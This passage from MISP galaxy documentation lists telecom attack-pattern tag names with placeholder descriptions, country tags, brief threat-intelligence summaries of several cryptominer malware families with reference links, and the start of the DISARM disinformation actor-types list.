The tag is: misp-galaxy:cmtmf-attack-pattern="Event Triggered Execution"

Spoofed radio network

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Spoofed radio network"

Infecting network nodes

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Infecting network nodes"

Code Injection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Code Injection"

Process Injection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Process Injection"

Masquerading

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Masquerading"

Disguise Root/Jailbreak Indicators

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Disguise Root/Jailbreak Indicators"

Evade Analysis Environment

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Evade Analysis Environment"

Modify Trusted Execution Environment

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Trusted Execution Environment"

Obfuscated Files or Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Obfuscated Files or Information"

Suppress Application Icon

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Suppress Application Icon"

Uninstall Malicious Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Uninstall Malicious Application"

Install Insecure or Malicious Configuration

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Install Insecure or Malicious Configuration"

Geofencing

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Geofencing"

Shutdown Remote Device

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Shutdown Remote Device"

Exploitation for Defense Evasion

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploitation for Defense Evasion"

Security Audit Camouflage

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Security Audit Camouflage"

Overload Avoidance

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Overload Avoidance"

Traffic Distribution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Traffic Distribution"

URI Hijacking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="URI Hijacking"

Modify Authentication Process

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Authentication Process"

Forced Authentication

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Forced Authentication"

System Network Connections Discovery

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="System Network Connections Discovery"

UE knocking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="UE knocking"

Internal Resource Search

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Internal Resource Search"

Network Sniffing

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Sniffing"

Abusing Inter-working Functionalities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Abusing Inter-working Functionalities"

Replication Through SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through SMS"

Replication Through Bluetooth

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through Bluetooth"

Replication Through WLAN

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through WLAN"

Replication Through IP

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through IP"

Exploit platform & service specific vulnerabilites

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit platform & service specific vulnerabilites"

Access Sensitive Data in Device Logs

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Access Sensitive Data in Device Logs"

Network Traffic Capture or Redirection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Traffic Capture or Redirection"

Network-specific identifiers

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network-specific identifiers"

Network-specific data

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network-specific data"

Application Layer Protocol

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Application Layer Protocol"

Communication via SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via SMS"

Communication via Bluetooth

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via Bluetooth"

Communication via WLAN

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via WLAN"

Exploit SS7 to Redirect Phone Calls/SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS"

Exploit SS7 to Track Device Location

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit SS7 to Track Device Location"

SS7-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SS7-based attacks"

Diameter-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Diameter-based attacks"

GTP-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="GTP-based attacks"

NAS-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="NAS-based attacks"

MEC-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="MEC-based attacks"

Network Slice

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Slice"

Automated Exfiltration

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Automated Exfiltration"

Data Encrypted

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Data Encrypted"

Alternate Network Mediums

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Alternate Network Mediums"

Data Manipulation

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Data Manipulation"

Endpoint Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Endpoint Denial of Service"

Carrier Billing Fraud

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Carrier Billing Fraud"

SMS Fraud

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SMS Fraud"

Manipulate Device Communication

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Manipulate Device Communication"

Jamming or Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Jamming or Denial of Service"

Location Tracking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Location Tracking"

Identity Exploit

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Identity Exploit"

Network Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Denial of Service"

Resource Hijacking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Resource Hijacking"

SLA Breach

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SLA Breach"

Customer Churn

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Customer Churn"

Country

Country meta information based on the database provided by geonames.org.

Country is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

geonames.org

andorra

Andorra

The tag is: misp-galaxy:country="andorra"

united arab emirates

United Arab Emirates

The tag is: misp-galaxy:country="united arab emirates"

afghanistan

Afghanistan

The tag is: misp-galaxy:country="afghanistan"

antigua and barbuda

Antigua and Barbuda

The tag is: misp-galaxy:country="antigua and barbuda"

anguilla

Anguilla

The tag is: misp-galaxy:country="anguilla"

albania

Albania

The tag is: misp-galaxy:country="albania"

armenia

Armenia

The tag is: misp-galaxy:country="armenia"

angola

Angola

The tag is: misp-galaxy:country="angola"

antarctica

Antarctica

The tag is: misp-galaxy:country="antarctica"

argentina

Argentina

The tag is: misp-galaxy:country="argentina"

american samoa

American Samoa

The tag is: misp-galaxy:country="american samoa"

austria

Austria

The tag is: misp-galaxy:country="austria"

australia

Australia

The tag is: misp-galaxy:country="australia"

aruba

Aruba

The tag is: misp-galaxy:country="aruba"

aland islands

Aland Islands

The tag is: misp-galaxy:country="aland islands"

azerbaijan

Azerbaijan

The tag is: misp-galaxy:country="azerbaijan"

bosnia and herzegovina

Bosnia and Herzegovina

The tag is: misp-galaxy:country="bosnia and herzegovina"

barbados

Barbados

The tag is: misp-galaxy:country="barbados"

bangladesh

Bangladesh

The tag is: misp-galaxy:country="bangladesh"

belgium

Belgium

The tag is: misp-galaxy:country="belgium"

burkina faso

Burkina Faso

The tag is: misp-galaxy:country="burkina faso"

bulgaria

Bulgaria

The tag is: misp-galaxy:country="bulgaria"

bahrain

Bahrain

The tag is: misp-galaxy:country="bahrain"

burundi

Burundi

The tag is: misp-galaxy:country="burundi"

benin

Benin

The tag is: misp-galaxy:country="benin"

saint barthelemy

Saint Barthelemy

The tag is: misp-galaxy:country="saint barthelemy"

bermuda

Bermuda

The tag is: misp-galaxy:country="bermuda"

brunei

Brunei

The tag is: misp-galaxy:country="brunei"

bolivia

Bolivia

The tag is: misp-galaxy:country="bolivia"

bonaire, saint eustatius and saba

Bonaire, Saint Eustatius and Saba

The tag is: misp-galaxy:country="bonaire, saint eustatius and saba "

brazil

Brazil

The tag is: misp-galaxy:country="brazil"

bahamas

Bahamas

The tag is: misp-galaxy:country="bahamas"

bhutan

Bhutan

The tag is: misp-galaxy:country="bhutan"

bouvet island

Bouvet Island

The tag is: misp-galaxy:country="bouvet island"

botswana

Botswana

The tag is: misp-galaxy:country="botswana"

belarus

Belarus

The tag is: misp-galaxy:country="belarus"

belize

Belize

The tag is: misp-galaxy:country="belize"

canada

Canada

The tag is: misp-galaxy:country="canada"

cocos islands

Cocos Islands

The tag is: misp-galaxy:country="cocos islands"

democratic republic of the congo

Democratic Republic of the Congo

The tag is: misp-galaxy:country="democratic republic of the congo"

central african republic

Central African Republic

The tag is: misp-galaxy:country="central african republic"

republic of the congo

Republic of the Congo

The tag is: misp-galaxy:country="republic of the congo"

switzerland

Switzerland

The tag is: misp-galaxy:country="switzerland"

ivory coast

Ivory Coast

The tag is: misp-galaxy:country="ivory coast"

cook islands

Cook Islands

The tag is: misp-galaxy:country="cook islands"

chile

Chile

The tag is: misp-galaxy:country="chile"

cameroon

Cameroon

The tag is: misp-galaxy:country="cameroon"

china

China

The tag is: misp-galaxy:country="china"

colombia

Colombia

The tag is: misp-galaxy:country="colombia"

costa rica

Costa Rica

The tag is: misp-galaxy:country="costa rica"

cuba

Cuba

The tag is: misp-galaxy:country="cuba"

cabo verde

Cabo Verde

The tag is: misp-galaxy:country="cabo verde"

curacao

Curacao

The tag is: misp-galaxy:country="curacao"

christmas island

Christmas Island

The tag is: misp-galaxy:country="christmas island"

cyprus

Cyprus

The tag is: misp-galaxy:country="cyprus"

czechia

Czechia

The tag is: misp-galaxy:country="czechia"

germany

Germany

The tag is: misp-galaxy:country="germany"

djibouti

Djibouti

The tag is: misp-galaxy:country="djibouti"

denmark

Denmark

The tag is: misp-galaxy:country="denmark"

dominica

Dominica

The tag is: misp-galaxy:country="dominica"

dominican republic

Dominican Republic

The tag is: misp-galaxy:country="dominican republic"

algeria

Algeria

The tag is: misp-galaxy:country="algeria"

ecuador

Ecuador

The tag is: misp-galaxy:country="ecuador"

estonia

Estonia

The tag is: misp-galaxy:country="estonia"

egypt

Egypt

The tag is: misp-galaxy:country="egypt"

western sahara

Western Sahara

The tag is: misp-galaxy:country="western sahara"

eritrea

Eritrea

The tag is: misp-galaxy:country="eritrea"

spain

Spain

The tag is: misp-galaxy:country="spain"

ethiopia

Ethiopia

The tag is: misp-galaxy:country="ethiopia"

finland

Finland

The tag is: misp-galaxy:country="finland"

fiji

Fiji

The tag is: misp-galaxy:country="fiji"

falkland islands

Falkland Islands

The tag is: misp-galaxy:country="falkland islands"

micronesia

Micronesia

The tag is: misp-galaxy:country="micronesia"

faroe islands

Faroe Islands

The tag is: misp-galaxy:country="faroe islands"

france

France

The tag is: misp-galaxy:country="france"

gabon

Gabon

The tag is: misp-galaxy:country="gabon"

united kingdom

United Kingdom

The tag is: misp-galaxy:country="united kingdom"

grenada

Grenada

The tag is: misp-galaxy:country="grenada"

georgia

Georgia

The tag is: misp-galaxy:country="georgia"

french guiana

French Guiana

The tag is: misp-galaxy:country="french guiana"

guernsey

Guernsey

The tag is: misp-galaxy:country="guernsey"

ghana

Ghana

The tag is: misp-galaxy:country="ghana"

gibraltar

Gibraltar

The tag is: misp-galaxy:country="gibraltar"

greenland

Greenland

The tag is: misp-galaxy:country="greenland"

gambia

Gambia

The tag is: misp-galaxy:country="gambia"

guinea

Guinea

The tag is: misp-galaxy:country="guinea"

guadeloupe

Guadeloupe

The tag is: misp-galaxy:country="guadeloupe"

equatorial guinea

Equatorial Guinea

The tag is: misp-galaxy:country="equatorial guinea"

greece

Greece

The tag is: misp-galaxy:country="greece"

south georgia and the south sandwich islands

South Georgia and the South Sandwich Islands

The tag is: misp-galaxy:country="south georgia and the south sandwich islands"

guatemala

Guatemala

The tag is: misp-galaxy:country="guatemala"

guam

Guam

The tag is: misp-galaxy:country="guam"

guinea-bissau

Guinea-Bissau

The tag is: misp-galaxy:country="guinea-bissau"

guyana

Guyana

The tag is: misp-galaxy:country="guyana"

hong kong

Hong Kong

The tag is: misp-galaxy:country="hong kong"

heard island and mcdonald islands

Heard Island and McDonald Islands

The tag is: misp-galaxy:country="heard island and mcdonald islands"

honduras

Honduras

The tag is: misp-galaxy:country="honduras"

croatia

Croatia

The tag is: misp-galaxy:country="croatia"

haiti

Haiti

The tag is: misp-galaxy:country="haiti"

hungary

Hungary

The tag is: misp-galaxy:country="hungary"

indonesia

Indonesia

The tag is: misp-galaxy:country="indonesia"

ireland

Ireland

The tag is: misp-galaxy:country="ireland"

israel

Israel

The tag is: misp-galaxy:country="israel"

isle of man

Isle of Man

The tag is: misp-galaxy:country="isle of man"

india

India

The tag is: misp-galaxy:country="india"

british indian ocean territory

British Indian Ocean Territory

The tag is: misp-galaxy:country="british indian ocean territory"

iraq

Iraq

The tag is: misp-galaxy:country="iraq"

iran

Iran

The tag is: misp-galaxy:country="iran"

iceland

Iceland

The tag is: misp-galaxy:country="iceland"

italy

Italy

The tag is: misp-galaxy:country="italy"

jersey

Jersey

The tag is: misp-galaxy:country="jersey"

jamaica

Jamaica

The tag is: misp-galaxy:country="jamaica"

jordan

Jordan

The tag is: misp-galaxy:country="jordan"

japan

Japan

The tag is: misp-galaxy:country="japan"

kenya

Kenya

The tag is: misp-galaxy:country="kenya"

kyrgyzstan

Kyrgyzstan

The tag is: misp-galaxy:country="kyrgyzstan"

cambodia

Cambodia

The tag is: misp-galaxy:country="cambodia"

kiribati

Kiribati

The tag is: misp-galaxy:country="kiribati"

comoros

Comoros

The tag is: misp-galaxy:country="comoros"

saint kitts and nevis

Saint Kitts and Nevis

The tag is: misp-galaxy:country="saint kitts and nevis"

north korea

North Korea

The tag is: misp-galaxy:country="north korea"

south korea

South Korea

The tag is: misp-galaxy:country="south korea"

kosovo

Kosovo

The tag is: misp-galaxy:country="kosovo"

kuwait

Kuwait

The tag is: misp-galaxy:country="kuwait"

cayman islands

Cayman Islands

The tag is: misp-galaxy:country="cayman islands"

kazakhstan

Kazakhstan

The tag is: misp-galaxy:country="kazakhstan"

laos

Laos

The tag is: misp-galaxy:country="laos"

lebanon

Lebanon

The tag is: misp-galaxy:country="lebanon"

saint lucia

Saint Lucia

The tag is: misp-galaxy:country="saint lucia"

liechtenstein

Liechtenstein

The tag is: misp-galaxy:country="liechtenstein"

sri lanka

Sri Lanka

The tag is: misp-galaxy:country="sri lanka"

liberia

Liberia

The tag is: misp-galaxy:country="liberia"

lesotho

Lesotho

The tag is: misp-galaxy:country="lesotho"

lithuania

Lithuania

The tag is: misp-galaxy:country="lithuania"

luxembourg

Luxembourg

The tag is: misp-galaxy:country="luxembourg"

latvia

Latvia

The tag is: misp-galaxy:country="latvia"

libya

Libya

The tag is: misp-galaxy:country="libya"

morocco

Morocco

The tag is: misp-galaxy:country="morocco"

monaco

Monaco

The tag is: misp-galaxy:country="monaco"

moldova

Moldova

The tag is: misp-galaxy:country="moldova"

montenegro

Montenegro

The tag is: misp-galaxy:country="montenegro"

saint martin

Saint Martin

The tag is: misp-galaxy:country="saint martin"

madagascar

Madagascar

The tag is: misp-galaxy:country="madagascar"

marshall islands

Marshall Islands

The tag is: misp-galaxy:country="marshall islands"

north macedonia

North Macedonia

The tag is: misp-galaxy:country="north macedonia"

mali

Mali

The tag is: misp-galaxy:country="mali"

myanmar

Myanmar

The tag is: misp-galaxy:country="myanmar"

mongolia

Mongolia

The tag is: misp-galaxy:country="mongolia"

macao

Macao

The tag is: misp-galaxy:country="macao"

northern mariana islands

Northern Mariana Islands

The tag is: misp-galaxy:country="northern mariana islands"

martinique

Martinique

The tag is: misp-galaxy:country="martinique"

mauritania

Mauritania

The tag is: misp-galaxy:country="mauritania"

montserrat

Montserrat

The tag is: misp-galaxy:country="montserrat"

malta

Malta

The tag is: misp-galaxy:country="malta"

mauritius

Mauritius

The tag is: misp-galaxy:country="mauritius"

maldives

Maldives

The tag is: misp-galaxy:country="maldives"

malawi

Malawi

The tag is: misp-galaxy:country="malawi"

mexico

Mexico

The tag is: misp-galaxy:country="mexico"

malaysia

Malaysia

The tag is: misp-galaxy:country="malaysia"

mozambique

Mozambique

The tag is: misp-galaxy:country="mozambique"

namibia

Namibia

The tag is: misp-galaxy:country="namibia"

new caledonia

New Caledonia

The tag is: misp-galaxy:country="new caledonia"

niger

Niger

The tag is: misp-galaxy:country="niger"

norfolk island

Norfolk Island

The tag is: misp-galaxy:country="norfolk island"

nigeria

Nigeria

The tag is: misp-galaxy:country="nigeria"

nicaragua

Nicaragua

The tag is: misp-galaxy:country="nicaragua"

netherlands

Netherlands

The tag is: misp-galaxy:country="netherlands"

norway

Norway

The tag is: misp-galaxy:country="norway"

nepal

Nepal

The tag is: misp-galaxy:country="nepal"

nauru

Nauru

The tag is: misp-galaxy:country="nauru"

niue

Niue

The tag is: misp-galaxy:country="niue"

new zealand

New Zealand

The tag is: misp-galaxy:country="new zealand"

oman

Oman

The tag is: misp-galaxy:country="oman"

panama

Panama

The tag is: misp-galaxy:country="panama"

peru

Peru

The tag is: misp-galaxy:country="peru"

french polynesia

French Polynesia

The tag is: misp-galaxy:country="french polynesia"

papua new guinea

Papua New Guinea

The tag is: misp-galaxy:country="papua new guinea"

philippines

Philippines

The tag is: misp-galaxy:country="philippines"

pakistan

Pakistan

The tag is: misp-galaxy:country="pakistan"

poland

Poland

The tag is: misp-galaxy:country="poland"

saint pierre and miquelon

Saint Pierre and Miquelon

The tag is: misp-galaxy:country="saint pierre and miquelon"

pitcairn

Pitcairn

The tag is: misp-galaxy:country="pitcairn"

puerto rico

Puerto Rico

The tag is: misp-galaxy:country="puerto rico"

palestinian territory

Palestinian Territory

The tag is: misp-galaxy:country="palestinian territory"

portugal

Portugal

The tag is: misp-galaxy:country="portugal"

palau

Palau

The tag is: misp-galaxy:country="palau"

paraguay

Paraguay

The tag is: misp-galaxy:country="paraguay"

qatar

Qatar

The tag is: misp-galaxy:country="qatar"

reunion

Reunion

The tag is: misp-galaxy:country="reunion"

romania

Romania

The tag is: misp-galaxy:country="romania"

serbia

Serbia

The tag is: misp-galaxy:country="serbia"

russia

Russia

The tag is: misp-galaxy:country="russia"

rwanda

Rwanda

The tag is: misp-galaxy:country="rwanda"

saudi arabia

Saudi Arabia

The tag is: misp-galaxy:country="saudi arabia"

solomon islands

Solomon Islands

The tag is: misp-galaxy:country="solomon islands"

seychelles

Seychelles

The tag is: misp-galaxy:country="seychelles"

sudan

Sudan

The tag is: misp-galaxy:country="sudan"

south sudan

South Sudan

The tag is: misp-galaxy:country="south sudan"

sweden

Sweden

The tag is: misp-galaxy:country="sweden"

singapore

Singapore

The tag is: misp-galaxy:country="singapore"

saint helena

Saint Helena

The tag is: misp-galaxy:country="saint helena"

slovenia

Slovenia

The tag is: misp-galaxy:country="slovenia"

svalbard and jan mayen

Svalbard and Jan Mayen

The tag is: misp-galaxy:country="svalbard and jan mayen"

slovakia

Slovakia

The tag is: misp-galaxy:country="slovakia"

sierra leone

Sierra Leone

The tag is: misp-galaxy:country="sierra leone"

san marino

San Marino

The tag is: misp-galaxy:country="san marino"

senegal

Senegal

The tag is: misp-galaxy:country="senegal"

somalia

Somalia

The tag is: misp-galaxy:country="somalia"

suriname

Suriname

The tag is: misp-galaxy:country="suriname"

sao tome and principe

Sao Tome and Principe

The tag is: misp-galaxy:country="sao tome and principe"

el salvador

El Salvador

The tag is: misp-galaxy:country="el salvador"

sint maarten

Sint Maarten

The tag is: misp-galaxy:country="sint maarten"

syria

Syria

The tag is: misp-galaxy:country="syria"

eswatini

Eswatini

The tag is: misp-galaxy:country="eswatini"

turks and caicos islands

Turks and Caicos Islands

The tag is: misp-galaxy:country="turks and caicos islands"

chad

Chad

The tag is: misp-galaxy:country="chad"

french southern territories

French Southern Territories

The tag is: misp-galaxy:country="french southern territories"

togo

Togo

The tag is: misp-galaxy:country="togo"

thailand

Thailand

The tag is: misp-galaxy:country="thailand"

tajikistan

Tajikistan

The tag is: misp-galaxy:country="tajikistan"

tokelau

Tokelau

The tag is: misp-galaxy:country="tokelau"

timor leste

Timor Leste

The tag is: misp-galaxy:country="timor leste"

turkmenistan

Turkmenistan

The tag is: misp-galaxy:country="turkmenistan"

tunisia

Tunisia

The tag is: misp-galaxy:country="tunisia"

tonga

Tonga

The tag is: misp-galaxy:country="tonga"

turkey

Turkey

The tag is: misp-galaxy:country="turkey"

trinidad and tobago

Trinidad and Tobago

The tag is: misp-galaxy:country="trinidad and tobago"

tuvalu

Tuvalu

The tag is: misp-galaxy:country="tuvalu"

taiwan

Taiwan

The tag is: misp-galaxy:country="taiwan"

tanzania

Tanzania

The tag is: misp-galaxy:country="tanzania"

ukraine

Ukraine

The tag is: misp-galaxy:country="ukraine"

uganda

Uganda

The tag is: misp-galaxy:country="uganda"

united states minor outlying islands

United States Minor Outlying Islands

The tag is: misp-galaxy:country="united states minor outlying islands"

united states of america

United States of America

The tag is: misp-galaxy:country="united states of america"

uruguay

Uruguay

The tag is: misp-galaxy:country="uruguay"

uzbekistan

Uzbekistan

The tag is: misp-galaxy:country="uzbekistan"

vatican

Vatican

The tag is: misp-galaxy:country="vatican"

saint vincent and the grenadines

Saint Vincent and the Grenadines

The tag is: misp-galaxy:country="saint vincent and the grenadines"

venezuela

Venezuela

The tag is: misp-galaxy:country="venezuela"

british virgin islands

British Virgin Islands

The tag is: misp-galaxy:country="british virgin islands"

u.s. virgin islands

U.S. Virgin Islands

The tag is: misp-galaxy:country="u.s. virgin islands"

vietnam

Vietnam

The tag is: misp-galaxy:country="vietnam"

vanuatu

Vanuatu

The tag is: misp-galaxy:country="vanuatu"

wallis and futuna

Wallis and Futuna

The tag is: misp-galaxy:country="wallis and futuna"

samoa

Samoa

The tag is: misp-galaxy:country="samoa"

yemen

Yemen

The tag is: misp-galaxy:country="yemen"

mayotte

Mayotte

The tag is: misp-galaxy:country="mayotte"

south africa

South Africa

The tag is: misp-galaxy:country="south africa"

zambia

Zambia

The tag is: misp-galaxy:country="zambia"

zimbabwe

Zimbabwe

The tag is: misp-galaxy:country="zimbabwe"

serbia and montenegro

Serbia and Montenegro

The tag is: misp-galaxy:country="serbia and montenegro"

netherlands antilles

Netherlands Antilles

The tag is: misp-galaxy:country="netherlands antilles"

Cryptominers

A list of cryptominer and cryptojacker malware.

Cryptominers is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Cisco Talos - raw-data

Lemon Duck

The infection starts with a PowerShell loading script, which is copied from other infected systems via SMB, email or external USB drives. The actor also employs several exploits for vulnerabilities such as SMBGhost and Eternal Blue.

The tag is: misp-galaxy:cryptominers="Lemon Duck"

Lemon Duck is also known as:

Table 983. Table References

Links

https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html

https://success.trendmicro.com/solution/000261916

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/spam/3697/spammers-use-covid19-to-spread-lemon-duck-cryptominer

https://cyberflorida.org/threat-advisory/lemon-duck-cryptominer/

Blue Mockingbird Cryptominer

Blue Mockingbird Cryptominer is a crypto-mining payload delivered as DLLs on Windows systems.

The tag is: misp-galaxy:cryptominers="Blue Mockingbird Cryptominer"

Table 985. Table References

Links

https://redcanary.com/blog/blue-mockingbird-cryptominer/

Krane

The Krane malware uses SSH brute-force techniques to drop the XMRig cryptominer on the target to mine for the Hashvault pool.

The tag is: misp-galaxy:cryptominers="Krane"

Table 986. Table References

Links

https://cujo.com/threat-alert-krane-malware/

Hezb

“Hezb”, which is based on command line artifact data, was observed around Kinsing. This malware is relatively new and was recently reported in late May exploiting WSO2 RCE (CVE-2022-29464) in the wild. Several malware components were observed, the first of which was an XMRig miner installed as “Hezb”. Additional modules included a polkit exploit for privilege escalation as well as a zero-detection ELF payload named “kik”.

The tag is: misp-galaxy:cryptominers="Hezb"

Table 987. Table References

Links

https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

Actor Types

DISARM is a framework designed for describing and understanding disinformation incidents.

Actor Types is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

data scientist

Person who can wrangle data, implement machine learning algorithms, etc.

The tag is: misp-galaxy:disarm-actortypes="data scientist"

Table 988. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A001.md

target

Person being targeted by disinformation campaign

The tag is: misp-galaxy:disarm-actortypes="target"

Table 989. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A002.md

trusted authority

Influencer

The tag is: misp-galaxy:disarm-actortypes="trusted authority"

Table 990. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A003.md

activist

The tag is: misp-galaxy:disarm-actortypes="activist"

Table 991. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A004.md

community group

The tag is: misp-galaxy:disarm-actortypes="community group"

Table 992. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A005.md

educator

The tag is: misp-galaxy:disarm-actortypes="educator"

Table 993. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A006.md

factchecker

Someone with the skills to verify whether information posted is factual

The tag is: misp-galaxy:disarm-actortypes="factchecker"

Table 994. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A007.md

library

The tag is: misp-galaxy:disarm-actortypes="library"

Table 995. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A008.md

NGO

The tag is: misp-galaxy:disarm-actortypes="NGO"

Table 996. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A009.md

religious organisation

The tag is: misp-galaxy:disarm-actortypes="religious organisation"

Table 997. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A010.md

school

The tag is: misp-galaxy:disarm-actortypes="school"

Table 998. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A011.md

account owner

Anyone who owns an account online

The tag is: misp-galaxy:disarm-actortypes="account owner"

Table 999. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A012.md

content creator

The tag is: misp-galaxy:disarm-actortypes="content creator"

Table 1000. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A013.md

elves

The tag is: misp-galaxy:disarm-actortypes="elves"

Table 1001. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A014.md

general public

The tag is: misp-galaxy:disarm-actortypes="general public"

Table 1002. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A015.md

influencer

The tag is: misp-galaxy:disarm-actortypes="influencer"

Table 1003. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A016.md

coordinating body

For example, the DHS.

The tag is: misp-galaxy:disarm-actortypes="coordinating body"

Table 1004. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A017.md

government

Government agencies

The tag is: misp-galaxy:disarm-actortypes="government"

Table 1005. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A018.md

military

The tag is: misp-galaxy:disarm-actortypes="military"

Table 1006. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A019.md

policy maker

The tag is: misp-galaxy:disarm-actortypes="policy maker"

Table 1007. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A020.md

media organisation

The tag is: misp-galaxy:disarm-actortypes="media organisation"

Table 1008. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A021.md

company

The tag is: misp-galaxy:disarm-actortypes="company"

Table 1009. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A022.md

adtech provider

The tag is: misp-galaxy:disarm-actortypes="adtech provider"

Table 1010. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A023.md

developer

The tag is: misp-galaxy:disarm-actortypes="developer"

Table 1011. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A024.md

funding_site_admin

Funding site admin

The tag is: misp-galaxy:disarm-actortypes="funding_site_admin"

Table 1012. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A025.md

games designer

The tag is: misp-galaxy:disarm-actortypes="games designer"

Table 1013. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A026.md

information security

The tag is: misp-galaxy:disarm-actortypes="information security"

Table 1014. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A027.md

platform administrator

The tag is: misp-galaxy:disarm-actortypes="platform administrator"

Table 1015. Table References

Links

